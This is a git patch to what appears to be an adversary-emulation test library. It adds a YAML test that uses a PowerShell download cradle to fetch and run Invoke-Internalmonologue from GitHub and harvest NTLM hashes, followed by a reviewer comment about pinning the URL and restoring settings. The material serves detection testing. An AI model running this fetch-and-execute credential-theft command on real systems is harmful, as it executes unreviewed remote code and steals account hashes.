From 2fd693ca91ce3d9127f1558355efb7d37cc9e82d Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:46:53 -0500
Subject: [PATCH] Update T1187.yaml (#1960)

Added PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
---
 atomics/T1187/T1187.yaml | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/atomics/T1187/T1187.yaml b/atomics/T1187/T1187.yaml
index 2760f3ee..41eb71ba 100644
--- a/atomics/T1187/T1187.yaml
+++ b/atomics/T1187/T1187.yaml
@@ -39,3 +39,12 @@ atomic_tests:
 command: |
 & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
 Write-Host "End of PetitPotam attack"
+- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+ description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+ Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+ name: powershell
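Review bot: The new test's `command` fetches `Invoke-Internalmonologue.ps1` from the mutable `master` branch and hands it straight to `iex`, so whatever that branch holds at run time executes on the test host with no review or integrity check. Pin the URL to a reviewed commit, e.g. `https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/<REVIEWED_COMMIT_SHA>/PowerSharpBinaries/Invoke-Internalmonologue.ps1` (placeholder SHA). The `-Downgrade true` switch presumably changes NTLM-related system settings and needs an elevated shell, yet the executor carries no `elevation_required: true`, and reverting depends solely on `-restore true` completing; a `cleanup_command`, or a description sentence stating what is modified, would help operators recover a host after an interrupted run. The `description` only repeats the test name; one sentence on the telemetry the test should produce (PowerShell script-block logging of the download, the outbound request to raw.githubusercontent.com) would make it more useful for detection validation.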